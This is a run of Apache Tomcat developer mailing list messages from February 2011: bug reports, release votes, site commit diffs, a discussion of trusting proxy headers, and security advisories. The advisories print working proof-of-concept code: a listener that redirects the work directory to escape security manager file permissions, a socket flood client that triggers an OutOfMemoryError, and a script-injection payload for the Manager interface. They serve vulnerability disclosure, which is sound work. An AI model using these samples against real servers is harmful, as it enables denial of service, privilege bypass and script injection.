This is the error I see in the logs:

Feb 3, 2011 11:44:15 PM org.apache.tomcat.util.http.Cookies processCookieHeader
INFO: Cookies: Invalid cookie. Value not a token or quoted value

Again, this only happens on IE 8 hitting 7.0.6 on Linux. Unfortunately we have a LOT of IE 8 users. I rolled back to Tomcat 6 and it's working fine again.

Thanks very much!
DO NOT REPLY [Bug 49525] IE8: Unabled to store data in HttpSession (root context)
https://issues.apache.org/bugzilla/show_bug.cgi?id=49525

Bmeist br...@tigernet.com changed:

What | Removed | Added
CC   |         | br...@tigernet.com
DO NOT REPLY [Bug 49525] IE8: Unabled to store data in HttpSession (root context)
https://issues.apache.org/bugzilla/show_bug.cgi?id=49525

Mark Thomas ma...@apache.org changed:

What       | Removed  | Added
Status     | REOPENED | RESOLVED
Resolution |          | FIXED

--- Comment #5 from Mark Thomas ma...@apache.org 2011-02-04 12:01:54 EST ---
I've just checked this as Tomcat 7 does return / as the cookie path by default.

From the error message, it looks like your client is sending mal-formed cookies. The users list is the place to get help with this - you need to provide an example cookie header that is failing.
DO NOT REPLY [Bug 50700] Context parameters are being overridden with parameters from the web application deployment descriptor
https://issues.apache.org/bugzilla/show_bug.cgi?id=50700

Oliver Doepner odoep...@gmail.com changed:

What       | Removed | Added
OS/Version |         | All

--- Comment #1 from Oliver Doepner odoep...@gmail.com 2011-02-04 13:52:27 EST ---
I can reproduce the problem (Tomcat 6.0.30 on JDK6u23, Windows XP, 32bit, *.zip distribution).
Re: [VOTE] Release Apache Tomcat 7.0.8
On 04/02/2011 13:52, Mark Thomas wrote:

The proposed Apache Tomcat 7.0.8 release is now available for voting.

It can be obtained from:
http://people.apache.org/~markt/dev/tomcat-7/v7.0.8/

The svn tag is:
http://svn.apache.org/repos/asf/tomcat/tc7.0.x/tags/TOMCAT_7_0_8/

The proposed 7.0.8 release is:

[ ] Broken - do not release
[ ] Alpha - go ahead and release as 7.0.8 Alpha
[ ] Beta - go ahead and release as 7.0.8 Beta
[X] Stable - go ahead and release as 7.0.8 Stable

TCKs all pass. ASF Jira has been running 7.0.8 since around 16.00 UTC without incident.

Mark
Re: [VOTE] Release build 6.0.32
On 02/02/2011 12:37 PM, jean-frederic clere wrote:

[X] Stable
Re: [VOTE] Release Apache Tomcat 7.0.8
On 02/04/2011 02:52 PM, Mark Thomas wrote:

The proposed Apache Tomcat 7.0.8 release is now available for voting.

[X] Stable - go ahead and release as 7.0.8 Stable

Regards
--
^TM
Re: [VOTE] Release Apache Tomcat 7.0.8
2011/2/4 Mark Thomas ma...@apache.org:

The proposed Apache Tomcat 7.0.8 release is now available for voting.

It can be obtained from:
http://people.apache.org/~markt/dev/tomcat-7/v7.0.8/

The svn tag is:
http://svn.apache.org/repos/asf/tomcat/tc7.0.x/tags/TOMCAT_7_0_8/

The proposed 7.0.8 release is:

[x] Stable - go ahead and release as 7.0.8 Stable

Best regards,
Konstantin Kolinko
Re: RemoteIpValve advices
On Jan 31, 2011, at 3:57 PM, Mark Thomas wrote:

On 31/01/2011 21:54, Henri Gomez wrote:

Not necessarily. The closest immediate proxy is the last entry in that list. You might not trust all of the machines in that proxy chain to provide legitimate IP details.

In my case, x-forwarded-for: 1.2.3.4, 10.122.47.36, 1.2.3.4 was my browser IP and 10.122.47.36 EC2 IP. The Valve is not activated by default and should only be used in Amazon Load Balancing case.

mod_remoteip has the concept of trusted vs. untrusted proxies, where only the trusted ones will be allowed to present the next-immediate-left IP address as a legitimate proxy address, and that IP is then compared to the trust list. So you might trust yahoo or google's proxy servers, but not your typically pwned user PC which is relaying spam or being employed as a DDoS agent.

x-forwarded-server: domU-12-31-38-00-B2-08.compute-1.internal is a trusted server, aka EC2 box.

So +1 to have this on RemoteIpFilter/Valve, a unique filter/valve to handle such cases.

Mark, do you need code contribution on RemoteIp Valve?

Patches to RemoteIpFilter/Valve are the place to start. The issue of trusted proxies is already handled so the patches should be able to take advantage of that.

I'm a bit slow catching up and picking up on this thread, but I want to make sure that we are very careful with who we trust and what we do with regards to the X-Forwarded-* headers. As they are just ad-hoc (non-)standards, there is very different behavior out there in the wild WRT proxies. In general (at least in my experience), the only header that is fairly well supported is X-Forwarded-For. All of the others are a crapshoot.

For example, say that a request goes through 3 proxies, A, B, and C. If they all behave relatively well, we will get an `X-Forwarded-For: A, B, C'. We trust B and C, so we will get a remote IP of A in TC. Now, we also get `X-Forwarded-Proto: https', `X-Forwarded-Host: foo', etc. Now where did these come from?

I have personally never seen a proxy that will append comma-separated values to any of these other headers (e.g. `X-Forwarded-Proto: https, http, http'), and even if they did, they could easily be forged. If anything is done with these, you had better be certain -- without a shadow of a doubt -- that these values can be trusted. That is, if you are only getting a single value for X-Forwarded-(Port|Proto|Host|Server|...), you need to be sure it was set by your last trusted proxy.

What does this mean from a TC perspective? Without an official standard for X-Forwarded-*, we need to be cautious about what we do with these headers. Even the handling we currently do with X-Forwarded-Proto and setting the port and scheme is dubious. Having the options to handle additional headers is good, but they should have to be explicitly enabled.

As for me, one of the first things I do when traffic hits my perimeter boxes is to strip off all X-Forwarded-* headers. That way when I use them internally, I know they can be trusted.
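The trust rules discussed in this thread, as an added example that is not part of the original messages and is not Tomcat's RemoteIpValve code: X-Forwarded-For is walked right to left through a trusted-proxy list, and the single-valued X-Forwarded-Proto is honoured only when explicitly enabled and sent by a trusted peer. The class name, method names, the 10.0.0.5 front proxy and the 203.0.113.9 / 198.51.100.7 addresses are assumptions made for the illustration.

```java
import java.util.ArrayList;
import java.util.Arrays;
import java.util.HashSet;
import java.util.List;
import java.util.Locale;
import java.util.Set;

// Added illustration; ForwardedHeaderPolicy and its methods are hypothetical names,
// not the RemoteIpValve/RemoteIpFilter implementation.
public class ForwardedHeaderPolicy {

    private final Set<String> trustedProxies;
    private final boolean protoHeaderEnabled; // X-Forwarded-Proto handling is opt-in

    public ForwardedHeaderPolicy(Set<String> trustedProxies, boolean protoHeaderEnabled) {
        this.trustedProxies = trustedProxies;
        this.protoHeaderEnabled = protoHeaderEnabled;
    }

    /** Walks X-Forwarded-For right to left and returns the first hop that is not a trusted proxy. */
    public String clientAddress(String peerAddr, String forwardedFor) {
        // The header means nothing unless the directly connected peer is one of our proxies.
        if (forwardedFor == null || !trustedProxies.contains(peerAddr)) {
            return peerAddr;
        }
        List<String> hops = new ArrayList<>();
        for (String part : forwardedFor.split(",")) {
            String hop = part.trim();
            if (!hop.isEmpty()) {
                hops.add(hop);
            }
        }
        String client = peerAddr;
        for (int i = hops.size() - 1; i >= 0; i--) {
            client = hops.get(i);
            if (!trustedProxies.contains(client)) {
                break; // entries further left were supplied by this untrusted hop
            }
        }
        return client;
    }

    /** Single-valued header: used only when enabled, sent by a trusted peer, and well formed. */
    public String scheme(String peerAddr, String forwardedProto, String connectorScheme) {
        if (!protoHeaderEnabled || forwardedProto == null || !trustedProxies.contains(peerAddr)) {
            return connectorScheme;
        }
        String value = forwardedProto.trim().toLowerCase(Locale.ROOT);
        // A comma-separated or otherwise unexpected value is ignored rather than guessed at.
        return (value.equals("http") || value.equals("https")) ? value : connectorScheme;
    }

    public static void main(String[] args) {
        // Constructed sample data: 10.0.0.5 is an assumed front proxy,
        // 10.122.47.36 is the EC2 hop quoted in the thread.
        Set<String> trusted = new HashSet<>(Arrays.asList("10.0.0.5", "10.122.47.36"));
        ForwardedHeaderPolicy policy = new ForwardedHeaderPolicy(trusted, true);

        // Header as quoted in the thread, arriving from a trusted peer.
        System.out.println(policy.clientAddress("10.0.0.5", "1.2.3.4, 10.122.47.36"));
        // An extra leftmost entry supplied by the client does not change the result.
        System.out.println(policy.clientAddress("10.0.0.5", "203.0.113.9, 1.2.3.4, 10.122.47.36"));
        // An untrusted peer cannot use the header to claim a different address.
        System.out.println(policy.clientAddress("198.51.100.7", "10.122.47.36"));
        // X-Forwarded-Proto: accepted from a trusted peer, ignored when multi-valued or untrusted.
        System.out.println(policy.scheme("10.0.0.5", "https", "http"));
        System.out.println(policy.scheme("10.0.0.5", "https, http", "http"));
        System.out.println(policy.scheme("198.51.100.7", "https", "http"));
    }
}
```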
svn commit: r1067289 - /tomcat/tc5.5.x/trunk/STATUS.txt
Author: pero Date: Fri Feb 4 21:17:44 2011 New Revision: 1067289 URL: http://svn.apache.org/viewvc?rev=1067289view=rev Log: add my vote Modified: tomcat/tc5.5.x/trunk/STATUS.txt Modified: tomcat/tc5.5.x/trunk/STATUS.txt URL: http://svn.apache.org/viewvc/tomcat/tc5.5.x/trunk/STATUS.txt?rev=1067289r1=1067288r2=1067289view=diff == --- tomcat/tc5.5.x/trunk/STATUS.txt (original) +++ tomcat/tc5.5.x/trunk/STATUS.txt Fri Feb 4 21:17:44 2011 @@ -37,7 +37,7 @@ PATCHES PROPOSED TO BACKPORT: svn delete connectors/util/java/org/apache/tomcat/util/net/jsse/JSSE13SocketFactory.java 2) http://people.apache.org/~kkolinko/patches/2010-03-06_tc55_remove_JSSE13Factory_v2.patch - +1: kkolinko, markt + +1: kkolinko, markt, pero -O: jim -1: @@ -45,7 +45,7 @@ PATCHES PROPOSED TO BACKPORT: Use JVM provided solutions to CVE-2009-3555 if available (i.e. RFC 5746 support) http://svn.apache.org/viewvc?rev=1065859view=rev - +1: markt, kkolinko + +1: markt, kkolinko, pero -1: kkolinko: 1) s/for (String cipher : ciphers){/for (int i=0; iciphers.length;i++){String cipher=ciphers[i];/ @@ -58,5 +58,5 @@ PATCHES PROPOSED TO BACKPORT: to allow more fine-grained control over which functionality is accessible, like it was done in Tomcat 6. http://people.apache.org/~kkolinko/patches/2011-02-03_tc55_roles.patch - +1: kkolinko + +1: kkolinko, pero -1:
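Review bot: In the second hunk, the +1 from pero on the CVE-2009-3555 backport entry is added without saying whether it applies to the referenced revision as committed or to the version with the change kkolinko lists directly beneath the vote lines (replacing `for (String cipher : ciphers)` with an indexed loop); stating that next to the vote would keep the tally unambiguous. In the first hunk, the unchanged context line reads `-O: jim` with a letter O, which looks like it was meant to be `-0`.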
Re: [VOTE] Release Apache Tomcat 7.0.8
+1

Peter

On 04.02.2011 at 14:52, Mark Thomas wrote:

The proposed Apache Tomcat 7.0.8 release is now available for voting.

It can be obtained from:
http://people.apache.org/~markt/dev/tomcat-7/v7.0.8/
The svn tag is:
http://svn.apache.org/repos/asf/tomcat/tc7.0.x/tags/TOMCAT_7_0_8/

The proposed 7.0.8 release is:
[ ] Broken - do not release
[ ] Alpha - go ahead and release as 7.0.8 Alpha
[ ] Beta - go ahead and release as 7.0.8 Beta
[x ] Stable - go ahead and release as 7.0.8 Stable

Cheers,
Mark
Re: [VOTE] Release Apache Tomcat 7.0.8
On 04/02/2011 13:52, Mark Thomas wrote:

The proposed Apache Tomcat 7.0.8 release is now available for voting.

It can be obtained from:
http://people.apache.org/~markt/dev/tomcat-7/v7.0.8/
The svn tag is:
http://svn.apache.org/repos/asf/tomcat/tc7.0.x/tags/TOMCAT_7_0_8/

The proposed 7.0.8 release is:
[ ] Broken - do not release
[ ] Alpha - go ahead and release as 7.0.8 Alpha
[ ] Beta - go ahead and release as 7.0.8 Beta
[ ] Stable - go ahead and release as 7.0.8 Stable

With 4 binding votes for stable, this vote passes. I'll kick off the process now and announce (probably tomorrow) once the mirrors catch up.

Mark
svn commit: r1067369 [2/2] - in /tomcat/site/trunk: docs/ xdocs/
Modified: tomcat/site/trunk/xdocs/whichversion.xml URL: http://svn.apache.org/viewvc/tomcat/site/trunk/xdocs/whichversion.xml?rev=1067369r1=1067368r2=1067369view=diff == --- tomcat/site/trunk/xdocs/whichversion.xml (original) +++ tomcat/site/trunk/xdocs/whichversion.xml Sat Feb 5 01:13:23 2011 @@ -28,7 +28,7 @@ mapping between the specifications and t tr td3.0/2.2/td td7.0.x/td - td7.0.6/td + td7.0.8/td td1.6/td /tr
svn commit: r1067370 - in /tomcat/site/trunk: docs/index.html xdocs/index.xml
Author: markt Date: Sat Feb 5 01:21:44 2011 New Revision: 1067370 URL: http://svn.apache.org/viewvc?rev=1067370view=rev Log: Add 7.0.8 to front page Modified: tomcat/site/trunk/docs/index.html tomcat/site/trunk/xdocs/index.xml Modified: tomcat/site/trunk/docs/index.html URL: http://svn.apache.org/viewvc/tomcat/site/trunk/docs/index.html?rev=1067370r1=1067369r2=1067370view=diff == --- tomcat/site/trunk/docs/index.html (original) +++ tomcat/site/trunk/docs/index.html Sat Feb 5 01:21:44 2011 @@ -3,18 +3,18 @@ html head titleApache Tomcat - Welcome!/title -meta content=Apache Tomcat Project name=author / -link rel=stylesheet href=stylesheets/tomcat.css type=text/css / -link media=print rel=stylesheet href=stylesheets/tomcat-printer.css type=text/css / +meta name=author content=Apache Tomcat Project/ +link type=text/css href=stylesheets/tomcat.css rel=stylesheet/ +link type=text/css href=stylesheets/tomcat-printer.css rel=stylesheet media=print/ /head -body vlink=#525D76 alink=#525D76 link=#525D76 text=#00 bgcolor=#ff -table cellspacing=0 width=100% border=0 +body bgcolor=#ff text=#00 link=#525D76 alink=#525D76 vlink=#525D76 +table border=0 width=100% cellspacing=0 !--PAGE HEADER-- tr td !--PROJECT LOGO-- a href=http://tomcat.apache.org/; -img border=0 alt=Tomcat Logo align=left src=./images/tomcat.gif / +img src=./images/tomcat.gif align=left alt=Tomcat Logo border=0/ /a /td td 
@@ -25,28 +25,28 @@ td !--APACHE LOGO-- a href=http://www.apache.org/; -img border=0 alt=Apache Logo align=right src=http://www.apache.org/images/asf-logo.gif; / +img src=http://www.apache.org/images/asf-logo.gif; align=right alt=Apache Logo border=0/ /a /td /tr /table div class=searchbox noPrint -form method=get action=http://www.google.com/search; -input type=hidden name=sitesearch value=tomcat.apache.org / -input type=text id=query name=q size=25 value=Search the Site / -input type=submit value=Search Site name=Search / +form action=http://www.google.com/search; method=get +input value=tomcat.apache.org name=sitesearch type=hidden/ +input value=Search the Site size=25 name=q id=query type=text/ +input name=Search value=Search Site type=submit/ /form /div -table cellspacing=4 width=100% border=0 +table border=0 width=100% cellspacing=4 !--HEADER SEPARATOR-- tr td colspan=2 -hr size=1 noshade= / +hr noshade= size=1/ /td /tr tr !--LEFT SIDE NAVIGATION-- -td class=noPrint nowrap=true valign=top width=20% +td width=20% valign=top nowrap=true class=noPrint p strongApache Tomcat/strong /p @@ -178,11 +178,11 @@ /ul /td !--RIGHT SIDE MAIN BODY-- -td id=mainBody align=left valign=top width=80% -table width=100% cellpadding=2 cellspacing=0 border=0 +td width=80% valign=top align=left id=mainBody +table border=0 cellspacing=0 cellpadding=2 width=100% tr td bgcolor=#525D76 -font face=arial,helvetica,sanserif color=#ff +font color=#ff face=arial,helvetica,sanserif a name=Apache Tomcat !--()-- /a 
@@ -224,25 +224,25 @@ project logo are trademarks of the Apach /tr tr td -br / +br/ /td /tr /table -table width=100% cellpadding=2 cellspacing=0 border=0 +table border=0 cellspacing=0 cellpadding=2 width=100% tr td bgcolor=#525D76 -font face=arial,helvetica,sanserif color=#ff -a name=Tomcat 7.0.6 Released +font color=#ff face=arial,helvetica,sanserif +a name=Tomcat 7.0.8 Released !--()-- /a -a name=Tomcat_7.0.6_Released -strongTomcat 7.0.6 Released/strong +a name=Tomcat_7.0.8_Released +strongTomcat 7.0.8 Released/strong /a /font /td -td bgcolor=#525D76 align=right -font face=arial,helvetica.sanserif color=#ff -strong2011-01-14/strong +td align=right bgcolor=#525D76 +font color=#ff face=arial,helvetica.sanserif +strong2011-02-05/strong /font /td /tr @@ -251,14 +251,13 @@ project logo are trademarks of the Apach p blockquote p -The Apache Tomcat Project is proud to announce the release of version 7.0.6 of -Apache Tomcat. This is the first stable release of the Tomcat 7 branch. This -release contains a number of bug fixes, further performance improvements in -session management and several enhancements to the memory leak detection and -prevention features./p +The Apache Tomcat Project is proud to announce the release of version 7.0.8 of +Apache Tomcat. This release includes security and bug fixes over Apache Tomcat +7.0.6./p + p align=center a href=download-70.cgiDownload/a | -a href=tomcat-7.0-doc/changelog.htmlChangeLog for 7.0.6/a +a href=tomcat-7.0-doc/changelog.htmlChangeLog for 7.0.8/a /p /blockquote /p @@ -266,14 +265,14 @@ prevention features./p /tr tr td -br / +br/ /td /tr /table -table width=100% cellpadding=2 cellspacing=0 border=0 +table border=0 cellspacing=0 cellpadding=2 width=100% tr td bgcolor=#525D76 -font face=arial,helvetica,sanserif color=#ff +font color=#ff face=arial,helvetica,sanserif a name=Tomcat 6.0.32 Released
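Review bot: Most of the changed lines in docs/index.html are attribute-order and whitespace churn in generated markup (for example `meta content=... name=author` becoming `meta name=author content=...`, and `br /` becoming `br/`), which buries the only substantive change, the 7.0.6 to 7.0.8 announcement block in the hunks at 224 and 251; regenerating the page in the same build environment as the previous revision would keep the diff to those lines. Separately, the date cell keeps `face=arial,helvetica.sanserif` with a period on both the removed and the added line, while the neighbouring cells use `arial,helvetica,sanserif`; that is worth correcting wherever this markup is generated.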
DO NOT REPLY [Bug 50721] New: RequestUtil.URLDecode() throws IllegalArgumentException for URLs with %xx-Code as last character
https://issues.apache.org/bugzilla/show_bug.cgi?id=50721

           Summary: RequestUtil.URLDecode() throws IllegalArgumentException for URLs with %xx-Code as last character
           Product: Tomcat 7
           Version: trunk
          Platform: All
        OS/Version: All
            Status: NEW
          Severity: normal
          Priority: P2
         Component: Catalina
        AssignedTo: dev@tomcat.apache.org
        ReportedBy: m...@zhaw.ch

When calling org.apache.catalina.util.RequestUtil.URLDecode() for a valid URL ending with a %xx-Code, the method throws the IllegalArgumentException "The % character must be followed by two hexademical digits".

This only happens, if the %xx-Code is at the end of the URL. It works fine for URLs ending with normal characters.

Example:
RequestUtil.URLDecode("http://localhost:8080/webdav/test%C3%A4", "UTF8") fails
RequestUtil.URLDecode("http://localhost:8080/webdav/test%C3%A4n", "UTF8") works fine

The problem is with the test in line 329 (added in revision: 905073):

    if (ix + 2 >= len) {

Because the index ix is already incremented in line 325, after reading the current byte b (e.g. the %-character), this test fails if %A4 is at the end, but does not fail for %A4n.

Simple fix: In line 329 the '>=' should be replaced by a '>':

    if (ix + 2 > len) {

This change should have no side effects, because ix is checked again before the next iteration. Because this change is trivial I did not include a patch.

Best regards
Christof
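The boundary condition described in this report, as an added example that is not Tomcat's RequestUtil source: a small in-place percent-decoder whose index handling follows the report (the read index is advanced past the % before the length test), run with the reported comparison and with the proposed one. The class name, the `corrected` switch and the shortened sample paths are assumptions; the example also goes slightly beyond the report by checking that genuinely truncated escapes are still rejected after the fix.

```java
import java.nio.charset.StandardCharsets;

// Added illustration; not the org.apache.catalina.util.RequestUtil implementation.
public class PercentDecodeBoundary {

    /** Decodes %xx escapes in place; 'corrected' selects the comparison proposed in the report. */
    static String decode(String s, boolean corrected) {
        byte[] bytes = s.getBytes(StandardCharsets.ISO_8859_1);
        int len = bytes.length;
        int ix = 0; // read index
        int ox = 0; // write index, never ahead of ix
        while (ix < len) {
            byte b = bytes[ix++]; // ix now points at the first hex digit, if any
            if (b == '%') {
                // The two digits live at ix and ix + 1, so ix + 2 == len is still a complete escape.
                boolean truncated = corrected ? (ix + 2 > len) : (ix + 2 >= len);
                if (truncated) {
                    throw new IllegalArgumentException("% must be followed by two hex digits");
                }
                b = (byte) ((hex(bytes[ix++]) << 4) + hex(bytes[ix++]));
            }
            bytes[ox++] = b;
        }
        return new String(bytes, 0, ox, StandardCharsets.UTF_8);
    }

    static int hex(byte b) {
        int digit = Character.digit((char) b, 16);
        if (digit < 0) {
            throw new IllegalArgumentException("Not a hexadecimal digit");
        }
        return digit;
    }

    static String attempt(String s, boolean corrected) {
        try {
            return "ok (" + decode(s, corrected).length() + " chars)";
        } catch (IllegalArgumentException e) {
            return "rejected";
        }
    }

    public static void main(String[] args) {
        // Constructed inputs: the first two mirror the URLs in the report,
        // the last two end in an incomplete escape and must be rejected either way.
        String[] samples = {
            "/webdav/test%C3%A4", "/webdav/test%C3%A4n", "/webdav/test%C3%A", "/webdav/test%"
        };
        for (String s : samples) {
            System.out.println(s + "  reported check: " + attempt(s, false)
                    + "  proposed check: " + attempt(s, true));
        }
    }
}
```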
[ANN] Apache Tomcat 7.0.8 released
The Apache Tomcat team announces the immediate availability of Apache Tomcat 7.0.8

Apache Tomcat 7.0.8 is primarily a security and bug fix release with numerous fixes compared to 7.0.6.

Please refer to the change log for the list of changes:
http://tomcat.apache.org/tomcat-7.0-doc/changelog.html

Note that this version has 4 zip binaries: a generic one and three bundled with Tomcat native binaries for Windows operating systems running on different CPU architectures.

Downloads:
http://tomcat.apache.org/download-70.cgi

Migration guide from Apache Tomcat 5.5.x and 6.0.x:
http://tomcat.apache.org/migration.html

Thank you,

-- The Apache Tomcat Team
[SECURITY] CVE-2010-3718 Apache Tomcat Local bypass of security manager file permissions
CVE-2010-3718 Apache Tomcat Local bypass of security manager file permissions

Severity: Low

Vendor: The Apache Software Foundation

Versions Affected:
- Tomcat 7.0.0 to 7.0.3
- Tomcat 6.0.0 to 6.0.?
- Tomcat 5.5.0 to 5.5.?
- Earlier, unsupported versions may also be affected

Description:
When running under a SecurityManager, access to the file system is limited but web applications are granted read/write permissions to the work directory. This directory is used for a variety of temporary files such as the intermediate files generated when compiling JSPs to Servlets. The location of the work directory is specified by a ServletContext attribute that is meant to be read-only to web applications. However, due to a coding error, the read-only setting was not applied. Therefore a malicious web application may modify the attribute before Tomcat applies the file permissions. This can be used to grant read/write permissions to any area on the file system which a malicious web application may then take advantage of. This vulnerability is only applicable when hosting web applications from untrusted sources such as shared hosting environments.

Example (AL2 licensed):

Listener source
---
    package listeners;

    import javax.servlet.ServletContext;
    import javax.servlet.ServletContextEvent;
    import javax.servlet.ServletContextListener;

    public final class FooListener implements ServletContextListener {

        public void contextInitialized(ServletContextEvent event) {
            ServletContext context = event.getServletContext();
            java.io.File workdir = (java.io.File) context
                    .getAttribute("javax.servlet.context.tempdir");
            if (workdir.toString().indexOf("..") < 0) {
                context.setAttribute("javax.servlet.context.tempdir",
                        new java.io.File(workdir, "../../../../conf"));
            }
        }

        public void contextDestroyed(ServletContextEvent event) {
        }
    }

web.xml snippet
---
    <listener>
        <listener-class>listeners.FooListener</listener-class>
    </listener>

Mitigation:
Users of affected versions should apply one of the following mitigations:
- Upgrade to a Tomcat version where this issue is fixed
- Undeploy all web applications from untrusted sources

Credit:
The issue was identified by the Tomcat security team.

References:
http://tomcat.apache.org/security.html
http://tomcat.apache.org/security-7.html
http://tomcat.apache.org/security-6.html
http://tomcat.apache.org/security-5.html
[SECURITY] Oracle JVM bug causes denial of service in Apache Tomcat
The original report is [1].

Tomcat is affected when accessing a form based security constrained page or any page that calls javax.servlet.ServletRequest.getLocale() or javax.servlet.ServletRequest.getLocales().

Work-arounds have been implemented in the following versions:
- 7.0.8 (released)
- 6.0.32 (released)
- 5.5.33 (released expected Monday 7 Feb 2011)

All users are recommended to upgrade to a Tomcat version with the work-around.

Users unable to upgrade can filter malicious requests via a Servlet filter, an httpd re-write rule (if Tomcat is behind an httpd reverse proxy) or other filtering as available. Accept-Language headers that are compliant with RFC 2616 can not trigger this bug. Therefore, filtering out all requests with non-compliant headers will provide protection against the DOS vulnerability.

The Apache Tomcat Security Team

[1] http://www.exploringbinary.com/java-hangs-when-converting-2-2250738585072012e-308/
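One way to implement the header check this advisory recommends, as an added example that is not the work-around shipped in Tomcat: a validator for the RFC 2616 Accept-Language grammar that a Servlet filter could call before anything asks the request for its locale. The class name, the 1024-character length cap and the sample header values are assumptions made for the illustration.

```java
import java.util.regex.Pattern;

// Added illustration; a Servlet filter would call isCompliant() on the raw header value
// and answer non-compliant requests with 400 before getLocale()/getLocales() is reached.
public class AcceptLanguageCheck {

    // RFC 2616: language-range = ( ( 1*8ALPHA *( "-" 1*8ALPHA ) ) | "*" )
    private static final String RANGE = "(?:\\*|[A-Za-z]{1,8}(?:-[A-Za-z]{1,8})*)";
    // RFC 2616: qvalue = ( "0" [ "." 0*3DIGIT ] ) | ( "1" [ "." 0*3("0") ] )
    private static final String QVALUE = "(?:0(?:\\.[0-9]{0,3})?|1(?:\\.0{0,3})?)";
    // One list element: language-range [ ";" "q" "=" qvalue ], with optional whitespace.
    private static final Pattern ELEMENT = Pattern.compile(
            RANGE + "(?:[ \\t]*;[ \\t]*[qQ][ \\t]*=[ \\t]*" + QVALUE + ")?");

    private static final int MAX_HEADER_LENGTH = 1024; // assumed cap, not taken from the advisory

    /** Returns true when the header is absent or matches the RFC 2616 Accept-Language grammar. */
    static boolean isCompliant(String header) {
        if (header == null) {
            return true;
        }
        if (header.length() > MAX_HEADER_LENGTH) {
            return false;
        }
        int elements = 0;
        for (String part : header.split(",", -1)) {
            String element = part.trim();
            if (element.isEmpty()) {
                continue; // the RFC 2616 list rule tolerates empty elements
            }
            if (!ELEMENT.matcher(element).matches()) {
                return false;
            }
            elements++;
        }
        return elements > 0; // the grammar requires at least one language-range
    }

    public static void main(String[] args) {
        // Constructed sample header values.
        String[] samples = {
            "da, en-gb;q=0.8, en;q=0.7", // well formed
            "*",                         // wildcard range
            "en-US,en;q=0.8,,de;q=0.5",  // empty list element is tolerated
            "en;q=1e-5",                 // exponent notation is not a qvalue
            "en;q=0.12345",              // more than three fraction digits
            "en;q=1.5",                  // qvalue above 1
            ""                           // no language-range at all
        };
        for (String s : samples) {
            System.out.println("\"" + s + "\" -> " + (isCompliant(s) ? "compliant" : "reject"));
        }
    }
}
```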
[SECURITY] CVE-2011-0534 Apache Tomcat DoS vulnerability
CVE-2011-0534 Apache Tomcat DoS vulnerability

Severity: Important

Vendor: The Apache Software Foundation

Versions Affected:
- Tomcat 7.0.0 to 7.0.6
- Tomcat 6.0.0 to 6.0.30

Description:
Tomcat did not enforce the maxHttpHeaderSize limit while parsing the request line in the NIO HTTP connector. A specially crafted request could trigger a DoS via an OutOfMemoryError.

Example (AL2 licensed):

    package bug50631;

    import java.io.OutputStream;
    import java.net.InetSocketAddress;
    import java.net.Socket;
    import java.net.SocketAddress;

    public class FloodClient1 {

        static final int k_step = 10;
        static byte[] value = new byte[k_step * 1024];

        public static void main(String[] args) throws Exception {
            int i = 0;
            while (i < value.length) {
                value[i++] = 13;
            }
            SocketAddress addr = new InetSocketAddress("localhost", 8080);
            Socket socket = new Socket();
            socket.setSoTimeout(0);
            socket.connect(addr, 0);
            OutputStream os = socket.getOutputStream();
            // InputStream is = socket.getInputStream();
            int k = k_step;
            int m = 0;
            int k100 = 100;
            while (m < 2000) {
                if (k >= k100) {
                    k100 += 100;
                    System.out.print('.');
                    System.out.flush();
                }
                if (k >= 1024) {
                    m++;
                    k -= 1024;
                    k100 = 100;
                    System.out.println(" " + m + "Mb");
                }
                os.write(value);
                os.flush();
                Thread.sleep(1);
                k+=k_step;
            }
        }
    }

Mitigation:
Users of affected versions should apply one of the following mitigations
- Upgrade to a Tomcat version where this issue is fixed
- Use a BIO or AJP HTTP connector in place of an NIO HTTP connector

Credit:
The issue was identified by the Tomcat security team.

References:
https://issues.apache.org/bugzilla/show_bug.cgi?id=50631
http://tomcat.apache.org/security.html
http://tomcat.apache.org/security-7.html
http://tomcat.apache.org/security-6.html
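The missing limit described in this advisory, shown from the server side as an added example that is not the NIO connector's code or the committed fix: a request-line reader that charges every byte it consumes, including skipped leading CR/LF, against one budget, so input that never reaches a line end is refused instead of growing the buffer. The class name, the 8192-byte budget and the sample inputs are assumptions made for the illustration.

```java
import java.io.ByteArrayInputStream;
import java.io.IOException;
import java.io.InputStream;
import java.nio.charset.StandardCharsets;
import java.util.Arrays;

// Added illustration; not Tomcat's request parser.
public class BoundedRequestLine {

    /**
     * Reads one request line. Every byte taken from the stream counts against maxBytes,
     * whether it is stored or skipped, so the buffer can never outgrow the budget.
     */
    static String readRequestLine(InputStream in, int maxBytes) throws IOException {
        byte[] line = new byte[Math.min(Math.max(maxBytes, 0), 256)];
        int consumed = 0; // bytes read so far, including skipped CR/LF
        int used = 0;     // bytes stored in 'line'
        int b;
        while ((b = in.read()) != -1) {
            if (++consumed > maxBytes) {
                throw new IllegalArgumentException("Request line exceeds " + maxBytes + " bytes");
            }
            if (b == '\r') {
                continue; // CR is ignored in this sketch; LF ends the line
            }
            if (b == '\n') {
                if (used == 0) {
                    continue; // blank line before the request line: skipped, but already counted
                }
                return new String(line, 0, used, StandardCharsets.ISO_8859_1);
            }
            if (used == line.length) {
                // used < consumed <= maxBytes here, so the new length is larger and within budget
                line = Arrays.copyOf(line, Math.min(maxBytes, line.length * 2));
            }
            line[used++] = (byte) b;
        }
        throw new IOException("Stream ended before the request line was complete");
    }

    static String attempt(byte[] input, int maxBytes) {
        try {
            return "accepted: " + readRequestLine(new ByteArrayInputStream(input), maxBytes);
        } catch (IllegalArgumentException | IOException e) {
            return "refused: " + e.getMessage();
        }
    }

    public static void main(String[] args) {
        int limit = 8192; // assumed budget for the illustration

        // Constructed input: an ordinary request line preceded by two blank lines.
        byte[] normal = "\r\n\r\nGET /index.html HTTP/1.1\r\n".getBytes(StandardCharsets.ISO_8859_1);

        // Constructed input: 10 KiB of CR bytes with no line end, the same byte value
        // the advisory's client fills its buffer with.
        byte[] endlessCr = new byte[10 * 1024];
        Arrays.fill(endlessCr, (byte) 13);

        System.out.println(attempt(normal, limit));
        System.out.println(attempt(endlessCr, limit));
    }
}
```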
[SECURITY] CVE-2011-0013 Apache Tomcat Manager XSS vulnerability
CVE-2011-0013 Apache Tomcat Manager XSS vulnerability

Severity: Low

Vendor: The Apache Software Foundation

Versions Affected:
- Tomcat 7.0.0 to 7.0.5
- Tomcat 6.0.0 to 6.0.29
- Tomcat 5.5.0 to 5.5.31
- Earlier, unsupported versions may also be affected

Description:
The HTML Manager interface displayed web application provided data, such as display names, without filtering. A malicious web application could trigger script execution by an administrative user when viewing the manager pages.

Example:
    <display-name>&lt;script&gt;alert('hi');&lt;/script&gt;</display-name>

Mitigation:
Users of affected versions should apply one of the following mitigations:
- Upgrade to a Tomcat version where this issue is fixed
